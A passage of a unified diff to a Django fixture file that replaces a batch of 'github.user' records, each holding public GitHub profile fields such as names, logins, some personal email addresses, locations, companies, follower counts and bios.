"2021-08-07T16:04:44Z", - "node_id": "MDQ6VXNlcjM3OTI0MTc1", - "bio": "", + "following_count": 328, + "followers_count": 725, + "public_gists_count": 44, + "public_repositories_count": 61, + "created_at": "2008-09-29T15:07:02Z", + "updated_at": "2024-08-07T06:13:33Z", + "node_id": "MDQ6VXNlcjI2NzUy", + "bio": "TypeScript • Unix • Open Source • Started transloadit.com, tus.io, uppy.io\r\n", "is_hireable": false, - "twitter_username": "" + "twitter_username": "kvz" } }, { "model": "github.user", - "pk": 2179, + "pk": 7509, "fields": { - "nest_created_at": "2024-09-12T01:10:35.314Z", - "nest_updated_at": "2024-09-12T01:15:29.188Z", - "name": "", - "login": "kiblik", + "nest_created_at": "2024-09-22T08:48:23.743Z", + "nest_updated_at": "2024-09-22T19:33:06.729Z", + "name": "Paul Smith", + "login": "paulcsmith", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5609770?v=4", - "company": "", - "location": "Earth", + "avatar_url": "https://avatars.githubusercontent.com/u/22394?v=4", + "company": "GitHub", + "location": "Apex, NC", "collaborators_count": 0, - "following_count": 34, - "followers_count": 9, - "public_gists_count": 1, - "public_repositories_count": 48, - "created_at": "2013-10-04T08:21:42Z", - "updated_at": "2024-07-29T15:27:31Z", - "node_id": "MDQ6VXNlcjU2MDk3NzA=", - "bio": "", - "is_hireable": true, + "following_count": 18, + "followers_count": 430, + "public_gists_count": 44, + "public_repositories_count": 88, + "created_at": "2008-08-28T20:51:37Z", + "updated_at": "2024-08-21T13:58:27Z", + "node_id": "MDQ6VXNlcjIyMzk0", + "bio": "Crystal, Ruby, Elixir and design lover. Creator of Lucky, Avram, and Bamboo. Co-creator of ExMachina.", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2180, + "pk": 7510, "fields": { - "nest_created_at": "2024-09-12T01:10:36.962Z", - "nest_updated_at": "2024-09-12T01:13:04.769Z", - "name": "Sever", - "login": "dsever", + "nest_created_at": "2024-09-22T08:48:24.057Z", + "nest_updated_at": "2024-09-22T19:33:07.045Z", + "name": "Phil Wareham", + "login": "philwareham", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7211879?v=4", - "company": "", - "location": "Croatia", + "avatar_url": "https://avatars.githubusercontent.com/u/413665?v=4", + "company": "Design Hive Ltd", + "location": "Haslemere, UK", "collaborators_count": 0, - "following_count": 9, - "followers_count": 9, - "public_gists_count": 0, - "public_repositories_count": 49, - "created_at": "2014-04-07T17:08:44Z", - "updated_at": "2024-07-11T15:41:25Z", - "node_id": "MDQ6VXNlcjcyMTE4Nzk=", - "bio": "Squad Lead, Deutsche Telekom Cloud Services", + "following_count": 52, + "followers_count": 60, + "public_gists_count": 2, + "public_repositories_count": 22, + "created_at": "2010-09-23T22:32:59Z", + "updated_at": "2024-09-06T16:03:19Z", + "node_id": "MDQ6VXNlcjQxMzY2NQ==", + "bio": "Multi disciplined designer, director of Design Hive Ltd. Monster Munch addict. Textpattern CMS project team member.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "philwareham" } }, { "model": "github.user", - "pk": 2181, + "pk": 7511, "fields": { - "nest_created_at": "2024-09-12T01:10:38.631Z", - "nest_updated_at": "2024-09-12T01:10:40.317Z", - "name": "", - "login": "rinaldistefano", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/71335929?v=4", + "nest_created_at": "2024-09-22T08:48:24.380Z", + "nest_updated_at": "2024-09-22T19:33:07.357Z", + "name": "Pierre Wilken", + "login": "pwilken", + "email": "kontakt@pierrewilken.de", + "avatar_url": "https://avatars.githubusercontent.com/u/34198662?v=4", "company": "", - "location": "", + "location": "Cologne", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-09-15T14:47:13Z", - "updated_at": "2023-01-05T07:55:28Z", - "node_id": "MDQ6VXNlcjcxMzM1OTI5", - "bio": "", - "is_hireable": false, + "following_count": 79, + "followers_count": 48, + "public_gists_count": 11, + "public_repositories_count": 33, + "created_at": "2017-12-02T23:13:29Z", + "updated_at": "2024-03-24T20:07:10Z", + "node_id": "MDQ6VXNlcjM0MTk4NjYy", + "bio": "DevOps Architect.\r\nInterested in software development, distributed systems, DevOps, software architecture and open source.", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2182, + "pk": 7512, "fields": { - "nest_created_at": "2024-09-12T01:10:41.981Z", - "nest_updated_at": "2024-09-12T01:10:49.980Z", - "name": "Mircea-Pavel Anton", - "login": "mircea-pavel-anton", - "email": "contact@mirceanton.com", - "avatar_url": "https://avatars.githubusercontent.com/u/28601784?v=4", - "company": "Raiffeisen Bank Romania", - "location": "Bucharest, Romania", + "nest_created_at": "2024-09-22T08:48:24.692Z", + "nest_updated_at": "2024-09-22T19:33:07.688Z", + "name": "Piotr Kuczynski", + "login": "pkuczynski", + "email": "piotr.kuczynski@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/374864?v=4", + "company": "freelancer", + "location": "Berlin, Germany", "collaborators_count": 0, - "following_count": 22, - "followers_count": 44, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2017-05-10T15:03:49Z", - "updated_at": "2024-09-04T16:38:43Z", - "node_id": "MDQ6VXNlcjI4NjAxNzg0", - "bio": "DevOps Engineer, Gym Rat and Drummer.", + "following_count": 18, + "followers_count": 135, + "public_gists_count": 10, + "public_repositories_count": 82, + "created_at": "2010-08-24T18:05:41Z", + "updated_at": "2024-08-29T10:13:34Z", + "node_id": "MDQ6VXNlcjM3NDg2NA==", + "bio": "Passionate about React, TypeScript and Node.js", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2183, + "pk": 7513, "fields": { - "nest_created_at": "2024-09-12T01:10:46.252Z", - "nest_updated_at": "2024-09-12T01:10:46.252Z", - "name": "Tomáš Novák", - "login": "MioOgbeni", - "email": "tom.nov96@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/24291977?v=4", - "company": "@broker-consulting ", - "location": "Prague, Czech Republic", + "nest_created_at": "2024-09-22T08:48:25.007Z", + "nest_updated_at": "2024-09-22T19:33:07.999Z", + "name": "Qais Patankar", + "login": "qaisjp", + "email": "qaisjp@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/923242?v=4", + "company": "@stripe", + "location": "nyc", "collaborators_count": 0, - "following_count": 13, - "followers_count": 3, - "public_gists_count": 12, - "public_repositories_count": 18, - "created_at": "2016-12-01T09:55:47Z", - "updated_at": "2024-06-16T14:31:02Z", - "node_id": "MDQ6VXNlcjI0MjkxOTc3", - "bio": "DevOps Engineer at Broker Consulting a.s.", + "following_count": 433, + "followers_count": 337, + "public_gists_count": 46, + "public_repositories_count": 186, + "created_at": "2011-07-18T15:54:46Z", + "updated_at": "2024-09-15T02:18:18Z", + "node_id": "MDQ6VXNlcjkyMzI0Mg==", + "bio": "Developer Productivity at Stripe", "is_hireable": false, + "twitter_username": "qaisjp" + } +}, +{ + "model": "github.user", + "pk": 7514, + "fields": { + "nest_created_at": "2024-09-22T08:48:25.320Z", + "nest_updated_at": "2024-09-22T19:33:08.340Z", + "name": "Remco Jongschaap", + "login": "Dougley", + "email": "hey@dougley.com", + "avatar_url": "https://avatars.githubusercontent.com/u/9768134?v=4", + "company": "Freelance", + "location": "The Netherlands", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 71, + "public_gists_count": 6, + "public_repositories_count": 59, + "created_at": "2014-11-15T14:44:16Z", + "updated_at": "2024-09-15T21:23:15Z", + "node_id": "MDQ6VXNlcjk3NjgxMzQ=", + "bio": "Professional presser of keyboard buttons", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2184, + "pk": 7515, "fields": { - "nest_created_at": "2024-09-12T01:10:48.711Z", - "nest_updated_at": "2024-09-12T01:15:13.161Z", - "name": "", - "login": "r0bag", + "nest_created_at": "2024-09-22T08:48:25.638Z", + "nest_updated_at": "2024-09-22T19:33:08.654Z", + "name": "Ricardo Rosales", + "login": "missingcharacter", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/18007694?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/728243?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 5, - "followers_count": 10, - "public_gists_count": 0, - "public_repositories_count": 24, - "created_at": "2016-03-22T13:09:20Z", - "updated_at": "2024-07-30T13:13:36Z", - "node_id": "MDQ6VXNlcjE4MDA3Njk0", + "following_count": 84, + "followers_count": 37, + "public_gists_count": 2, + "public_repositories_count": 40, + "created_at": "2011-04-14T00:51:13Z", + "updated_at": "2024-08-18T18:04:15Z", + "node_id": "MDQ6VXNlcjcyODI0Mw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -414853,74 +673802,74 @@ }, { "model": "github.user", - "pk": 2185, + "pk": 7516, "fields": { - "nest_created_at": "2024-09-12T01:10:51.251Z", - "nest_updated_at": "2024-09-12T01:31:59.964Z", - "name": "", - "login": "AndreVirtimo", + "nest_created_at": "2024-09-22T08:48:25.974Z", + "nest_updated_at": "2024-09-22T19:33:08.974Z", + "name": "Ricardo Signes", + "login": "rjbs", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11404063?v=4", - "company": "Virtimo AG", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/30682?v=4", + "company": "@Fastmail", + "location": "Philadelphia, PA, USA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 10, - "created_at": "2015-03-10T08:19:18Z", - "updated_at": "2024-08-15T04:27:28Z", - "node_id": "MDQ6VXNlcjExNDA0MDYz", - "bio": "", + "following_count": 23, + "followers_count": 412, + "public_gists_count": 180, + "public_repositories_count": 524, + "created_at": "2008-10-23T19:10:00Z", + "updated_at": "2024-06-02T15:01:56Z", + "node_id": "MDQ6VXNlcjMwNjgy", + "bio": "I write a lot of Perl code, but all languages are my allies.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2186, + "pk": 7517, "fields": { - "nest_created_at": "2024-09-12T01:10:52.513Z", - "nest_updated_at": "2024-09-12T01:10:52.513Z", - "name": "", - "login": "jonathan-hafner", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/84336164?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:48:26.322Z", + "nest_updated_at": "2024-09-22T19:33:09.316Z", + "name": "Robbie Trencheny", + "login": "robbiet480", + "email": "me@robbiet.us", + "avatar_url": "https://avatars.githubusercontent.com/u/18516?v=4", + "company": "@campustech", + "location": "Oakland, CA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-05-17T15:13:12Z", - "updated_at": "2023-10-04T13:01:56Z", - "node_id": "MDQ6VXNlcjg0MzM2MTY0", + "following_count": 50, + "followers_count": 258, + "public_gists_count": 76, + "public_repositories_count": 249, + "created_at": "2008-07-26T20:33:05Z", + "updated_at": "2024-09-22T04:09:01Z", + "node_id": "MDQ6VXNlcjE4NTE2", "bio": "", - "is_hireable": false, - "twitter_username": "" + "is_hireable": true, + "twitter_username": "Robbie" } }, { "model": "github.user", - "pk": 2187, + "pk": 7518, "fields": { - "nest_created_at": "2024-09-12T01:10:55.099Z", - "nest_updated_at": "2024-09-12T01:10:55.099Z", - "name": "", - "login": "oliversommer", + "nest_created_at": "2024-09-22T08:48:26.636Z", + "nest_updated_at": "2024-09-22T19:33:09.642Z", + "name": "Roman Baumer", + "login": "rba", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9266650?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/123666?v=4", + "company": "@baumerits ", + "location": "Switzerland", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2014-10-16T11:24:03Z", - "updated_at": "2023-12-22T17:18:24Z", - "node_id": "MDQ6VXNlcjkyNjY2NTA=", + "following_count": 10, + "followers_count": 15, + "public_gists_count": 16, + "public_repositories_count": 20, + "created_at": "2009-09-05T22:07:06Z", + "updated_at": "2024-08-06T05:38:20Z", + "node_id": "MDQ6VXNlcjEyMzY2Ng==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -414928,549 +673877,574 @@ }, { "model": "github.user", - "pk": 2188, + "pk": 7519, "fields": { - "nest_created_at": "2024-09-12T01:10:59.256Z", - "nest_updated_at": "2024-09-12T01:10:59.256Z", - "name": "", - "login": "zappaar", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/44434135?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:48:26.957Z", + "nest_updated_at": "2024-09-22T19:33:09.953Z", + "name": "Ryan Hurst", + "login": "rmhrisk", + "email": "rmh@unmitigatedrisk.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1619279?v=4", + "company": "Peculiar Ventures", + "location": "Seattle, San Francisco", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-10-24T11:22:39Z", - "updated_at": "2023-11-25T17:54:27Z", - "node_id": "MDQ6VXNlcjQ0NDM0MTM1", - "bio": "", + "following_count": 44, + "followers_count": 81, + "public_gists_count": 15, + "public_repositories_count": 11, + "created_at": "2012-04-06T17:25:01Z", + "updated_at": "2024-09-22T15:30:12Z", + "node_id": "MDQ6VXNlcjE2MTkyNzk=", + "bio": "@google, @letsencrypt, @globalsign, @microsoft, @PeculiarVentures and others.\r\n\r\nI like cryptography and modern web applications.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2189, + "pk": 7520, "fields": { - "nest_created_at": "2024-09-12T01:11:00.075Z", - "nest_updated_at": "2024-09-12T01:14:15.226Z", - "name": "salvatore d'amico", - "login": "saldam72", + "nest_created_at": "2024-09-22T08:48:27.275Z", + "nest_updated_at": "2024-09-22T19:33:10.278Z", + "name": "Rye Mutt", + "login": "RyeMutt", + "email": "rye@alchemyviewer.org", + "avatar_url": "https://avatars.githubusercontent.com/u/343176?v=4", + "company": "@AlchemyViewer ", + "location": "Pittsburgh, PA", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 19, + "public_gists_count": 9, + "public_repositories_count": 38, + "created_at": "2010-07-25T02:14:41Z", + "updated_at": "2024-09-15T11:22:22Z", + "node_id": "MDQ6VXNlcjM0MzE3Ng==", + "bio": "Just a dog barking in code.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7521, + "fields": { + "nest_created_at": "2024-09-22T08:48:27.603Z", + "nest_updated_at": "2024-09-22T19:33:10.589Z", + "name": "Samuel Attard", + "login": "MarshallOfSound", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/72754155?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6634592?v=4", "company": "", - "location": "", + "location": "Vancouver, Canada", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2020-10-12T15:38:12Z", - "updated_at": "2024-02-02T14:36:41Z", - "node_id": "MDQ6VXNlcjcyNzU0MTU1", - "bio": "", + "following_count": 1, + "followers_count": 1890, + "public_gists_count": 33, + "public_repositories_count": 196, + "created_at": "2014-02-10T01:24:35Z", + "updated_at": "2024-09-21T00:26:22Z", + "node_id": "MDQ6VXNlcjY2MzQ1OTI=", + "bio": "Former Desktop @ SlackHQ • Core :electron: Electron Maintainer\r\n• Contributor to Chromium, Node.JS", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2190, + "pk": 7522, "fields": { - "nest_created_at": "2024-09-12T01:11:02.601Z", - "nest_updated_at": "2024-09-12T01:11:03.837Z", - "name": "Alexandre Teyar", - "login": "aress31", + "nest_created_at": "2024-09-22T08:48:27.938Z", + "nest_updated_at": "2024-09-22T19:33:10.901Z", + "name": "Samuel Nitsche", + "login": "pesse", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11601622?v=4", - "company": "@aegiscyber ", - "location": "Warrington, United Kingdom", + "avatar_url": "https://avatars.githubusercontent.com/u/8362976?v=4", + "company": "", + "location": "Germany", "collaborators_count": 0, - "following_count": 15, - "followers_count": 345, - "public_gists_count": 0, - "public_repositories_count": 50, - "created_at": "2015-03-22T19:32:19Z", - "updated_at": "2024-08-30T08:20:18Z", - "node_id": "MDQ6VXNlcjExNjAxNjIy", - "bio": "Keep calm and hack something, but remember to wear a ninja mask for added stealth. 🐱‍👤😎", + "following_count": 5, + "followers_count": 19, + "public_gists_count": 7, + "public_repositories_count": 25, + "created_at": "2014-08-05T12:57:58Z", + "updated_at": "2024-09-17T07:28:15Z", + "node_id": "MDQ6VXNlcjgzNjI5NzY=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2191, + "pk": 7523, "fields": { - "nest_created_at": "2024-09-12T01:11:05.083Z", - "nest_updated_at": "2024-09-12T01:11:05.083Z", - "name": "Mike Lloyd", - "login": "mike-lloyd03", + "nest_created_at": "2024-09-22T08:48:28.562Z", + "nest_updated_at": "2024-09-22T19:33:11.523Z", + "name": "Selwin Ong", + "login": "selwin", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/49411532?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/188658?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 15, - "public_gists_count": 1, - "public_repositories_count": 93, - "created_at": "2019-04-08T17:44:35Z", - "updated_at": "2024-09-03T12:06:36Z", - "node_id": "MDQ6VXNlcjQ5NDExNTMy", + "following_count": 16, + "followers_count": 120, + "public_gists_count": 17, + "public_repositories_count": 40, + "created_at": "2010-01-24T04:00:12Z", + "updated_at": "2024-09-19T11:45:09Z", + "node_id": "MDQ6VXNlcjE4ODY1OA==", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2192, + "pk": 7524, "fields": { - "nest_created_at": "2024-09-12T01:11:06.033Z", - "nest_updated_at": "2024-09-12T01:26:43.558Z", - "name": "Aleg Vilinski", - "login": "italvi", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/58322186?v=4", - "company": "@festo-se", - "location": "", + "nest_created_at": "2024-09-22T08:48:28.876Z", + "nest_updated_at": "2024-09-22T19:33:11.839Z", + "name": "Xavier Damman", + "login": "xdamman", + "email": "xdamman@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/74358?v=4", + "company": "@opencollective ", + "location": "Brussels", "collaborators_count": 0, - "following_count": 0, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2019-11-29T06:28:49Z", - "updated_at": "2024-07-03T09:39:40Z", - "node_id": "MDQ6VXNlcjU4MzIyMTg2", - "bio": "", + "following_count": 5, + "followers_count": 263, + "public_gists_count": 23, + "public_repositories_count": 86, + "created_at": "2009-04-16T08:19:17Z", + "updated_at": "2024-09-01T16:55:20Z", + "node_id": "MDQ6VXNlcjc0MzU4", + "bio": "Dad. Entrepreneur (@opencollective, Storify). Now into web3 x community currencies with @citizenwallet. Contributor to regensunite.earth, allforclimate.earth.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2193, + "pk": 7525, "fields": { - "nest_created_at": "2024-09-12T01:11:07.303Z", - "nest_updated_at": "2024-09-12T01:11:07.303Z", - "name": "", - "login": "kokhanevych-macpaw", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/81617047?v=4", - "company": "", + "nest_created_at": "2024-09-22T08:48:29.185Z", + "nest_updated_at": "2024-09-22T19:33:12.189Z", + "name": "Marcin Sędłak-Jakubowski", + "login": "fdmarcin", + "email": "fdmarcin@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/25668969?v=4", + "company": "GitLab", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2021-03-30T08:33:46Z", - "updated_at": "2024-05-10T09:47:46Z", - "node_id": "MDQ6VXNlcjgxNjE3MDQ3", - "bio": "", + "following_count": 5, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 10, + "created_at": "2017-02-09T17:22:12Z", + "updated_at": "2024-08-26T16:51:41Z", + "node_id": "MDQ6VXNlcjI1NjY4OTY5", + "bio": "Technical writer at GitLab, open-source fan, ex-English teacher. Into indie games and thinking about game design. 🏳️‍🌈 ally. he/him or they/them pronouns.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2194, + "pk": 7526, "fields": { - "nest_created_at": "2024-09-12T01:11:09.845Z", - "nest_updated_at": "2024-09-12T01:11:09.845Z", - "name": "", - "login": "fxble", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/73400438?v=4", - "company": "", - "location": "Germany", + "nest_created_at": "2024-09-22T08:48:29.495Z", + "nest_updated_at": "2024-09-22T19:33:12.508Z", + "name": "Matan Kushner", + "login": "matchai", + "email": "hello@matchai.dev", + "avatar_url": "https://avatars.githubusercontent.com/u/4658208?v=4", + "company": "@FAKKU @AniList", + "location": "Tokyo, Japan", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-10-24T17:22:51Z", - "updated_at": "2024-08-23T11:44:56Z", - "node_id": "MDQ6VXNlcjczNDAwNDM4", - "bio": "", + "following_count": 433, + "followers_count": 1035, + "public_gists_count": 10, + "public_repositories_count": 145, + "created_at": "2013-06-10T05:21:04Z", + "updated_at": "2024-09-21T04:54:08Z", + "node_id": "MDQ6VXNlcjQ2NTgyMDg=", + "bio": "he/him ⋅ Performant applications and delightful user experiences ✨ ⋅ Dev at @FAKKU 🔞 and @anilist ⋅ Working on \r\n@starship", "is_hireable": false, - "twitter_username": "" + "twitter_username": "matchai" } }, { "model": "github.user", - "pk": 2195, + "pk": 7527, "fields": { - "nest_created_at": "2024-09-12T01:11:11.125Z", - "nest_updated_at": "2024-09-12T01:11:11.125Z", - "name": "Farhan Saif Chowdhury", - "login": "farhansaifchowdhury", + "nest_created_at": "2024-09-22T08:48:29.811Z", + "nest_updated_at": "2024-09-22T19:33:12.836Z", + "name": "Matteo Carrara", + "login": "MatteCarra", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/31181169?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/11074527?v=4", "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2017-08-20T11:20:58Z", - "updated_at": "2024-02-23T06:22:34Z", - "node_id": "MDQ6VXNlcjMxMTgxMTY5", - "bio": "", + "location": "Milan, Italia", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 71, + "public_gists_count": 2, + "public_repositories_count": 50, + "created_at": "2015-02-19T12:41:00Z", + "updated_at": "2024-09-19T21:38:09Z", + "node_id": "MDQ6VXNlcjExMDc0NTI3", + "bio": "Student at Politecnico di Milano", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2196, + "pk": 7528, "fields": { - "nest_created_at": "2024-09-12T01:11:12.379Z", - "nest_updated_at": "2024-09-12T01:11:12.379Z", - "name": "", - "login": "dumprop", + "nest_created_at": "2024-09-22T08:48:30.132Z", + "nest_updated_at": "2024-09-22T19:33:13.151Z", + "name": "Matthias Wahl", + "login": "mfelsche", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/34004367?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1152667?v=4", "company": "", - "location": "", + "location": "Berlin", "collaborators_count": 0, - "following_count": 69, - "followers_count": 16, - "public_gists_count": 1, - "public_repositories_count": 40, - "created_at": "2017-11-26T14:30:04Z", - "updated_at": "2024-08-14T11:37:11Z", - "node_id": "MDQ6VXNlcjM0MDA0MzY3", - "bio": "", - "is_hireable": true, + "following_count": 7, + "followers_count": 61, + "public_gists_count": 33, + "public_repositories_count": 104, + "created_at": "2011-10-26T08:34:40Z", + "updated_at": "2024-08-20T13:32:38Z", + "node_id": "MDQ6VXNlcjExNTI2Njc=", + "bio": "Rust and Pony", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2197, + "pk": 7529, "fields": { - "nest_created_at": "2024-09-12T01:11:13.605Z", - "nest_updated_at": "2024-09-12T01:11:13.605Z", - "name": "Alex Oladele", - "login": "dragid10", - "email": "dragid10@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/4042877?v=4", - "company": "@IBM ", - "location": "Raleigh NC", + "nest_created_at": "2024-09-22T08:48:30.484Z", + "nest_updated_at": "2024-09-22T19:33:13.462Z", + "name": "Mert ÇELEN", + "login": "mertcelen", + "email": "mcelen94@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/9132682?v=4", + "company": "", + "location": "Izmir,Turkey", "collaborators_count": 0, - "following_count": 70, - "followers_count": 29, - "public_gists_count": 9, - "public_repositories_count": 39, - "created_at": "2013-04-03T00:39:20Z", - "updated_at": "2024-09-02T22:28:30Z", - "node_id": "MDQ6VXNlcjQwNDI4Nzc=", - "bio": "Software Dev / SRE @IBM \r\nI typically write Python and occasionally some Kotlin", + "following_count": 38, + "followers_count": 71, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2014-10-10T10:31:41Z", + "updated_at": "2024-09-14T20:45:54Z", + "node_id": "MDQ6VXNlcjkxMzI2ODI=", + "bio": "Backend Developer", "is_hireable": true, - "twitter_username": "Wizkid_alex" + "twitter_username": "mcelen35" } }, { "model": "github.user", - "pk": 2198, + "pk": 7530, "fields": { - "nest_created_at": "2024-09-12T01:11:14.874Z", - "nest_updated_at": "2024-09-12T01:11:16.097Z", - "name": "", - "login": "Grobatow", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/106585630?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:48:30.801Z", + "nest_updated_at": "2024-09-22T19:33:13.772Z", + "name": "Michael Ball", + "login": "cycomachead", + "email": "cycomachead@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1505907?v=4", + "company": "@ucberkeley @snap-cloud Formerly @gradescope", + "location": "Bay Area, CA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2022-05-31T08:39:41Z", - "updated_at": "2022-10-28T11:35:37Z", - "node_id": "U_kgDOBlpeHg", - "bio": "", + "following_count": 158, + "followers_count": 146, + "public_gists_count": 14, + "public_repositories_count": 155, + "created_at": "2012-03-06T07:02:42Z", + "updated_at": "2024-09-10T21:03:08Z", + "node_id": "MDQ6VXNlcjE1MDU5MDc=", + "bio": "Lecturer UC Berkeley CS\r\n\r\nEducational stuff for @beautyjoy & @snap-cloud @gradescope", "is_hireable": false, - "twitter_username": "" + "twitter_username": "_mball_" } }, { "model": "github.user", - "pk": 2199, + "pk": 7531, "fields": { - "nest_created_at": "2024-09-12T01:11:17.308Z", - "nest_updated_at": "2024-09-12T01:11:17.308Z", - "name": "Arto Jonsson", - "login": "artoj", - "email": "arto@artojonsson.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1174582?v=4", + "nest_created_at": "2024-09-22T08:48:31.133Z", + "nest_updated_at": "2024-09-22T19:33:14.091Z", + "name": "xMike", + "login": "mhulet", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/293355?v=4", "company": "", - "location": "Finland", + "location": "Earth", "collaborators_count": 0, - "following_count": 1, - "followers_count": 8, - "public_gists_count": 1, - "public_repositories_count": 17, - "created_at": "2011-11-05T15:59:54Z", - "updated_at": "2024-07-18T11:13:25Z", - "node_id": "MDQ6VXNlcjExNzQ1ODI=", - "bio": "", + "following_count": 15, + "followers_count": 22, + "public_gists_count": 7, + "public_repositories_count": 10, + "created_at": "2010-06-01T15:13:43Z", + "updated_at": "2024-08-22T12:20:52Z", + "node_id": "MDQ6VXNlcjI5MzM1NQ==", + "bio": "Organic Hacker", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2200, + "pk": 7532, "fields": { - "nest_created_at": "2024-09-12T01:11:19Z", - "nest_updated_at": "2024-09-12T01:11:19Z", - "name": "Andres Oviedo", - "login": "andresoviedo", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1988725?v=4", - "company": "andresoviedo.org", - "location": "Barcelona", + "nest_created_at": "2024-09-22T08:48:31.446Z", + "nest_updated_at": "2024-09-22T19:33:14.409Z", + "name": "Mikhail Dronov", + "login": "dronov", + "email": "twtrp@proton.me", + "avatar_url": "https://avatars.githubusercontent.com/u/851423?v=4", + "company": "@Restream ", + "location": "Belgrade, Serbia", "collaborators_count": 0, - "following_count": 2, - "followers_count": 83, + "following_count": 35, + "followers_count": 32, "public_gists_count": 10, - "public_repositories_count": 8, - "created_at": "2012-07-17T03:39:16Z", - "updated_at": "2024-09-06T20:51:04Z", - "node_id": "MDQ6VXNlcjE5ODg3MjU=", - "bio": "Software developer living in Barcelona. Programming is my passion. Open source is my contribution to the world.\r\nCurrently focused on 3D world", - "is_hireable": true, + "public_repositories_count": 61, + "created_at": "2011-06-15T09:44:52Z", + "updated_at": "2024-06-10T08:46:28Z", + "node_id": "MDQ6VXNlcjg1MTQyMw==", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2201, + "pk": 7533, "fields": { - "nest_created_at": "2024-09-12T01:11:21.525Z", - "nest_updated_at": "2024-09-12T01:11:21.525Z", - "name": "", - "login": "8L4ckc0FF33", + "nest_created_at": "2024-09-22T08:48:31.769Z", + "nest_updated_at": "2024-09-22T19:33:14.727Z", + "name": "Moritz Sternemann", + "login": 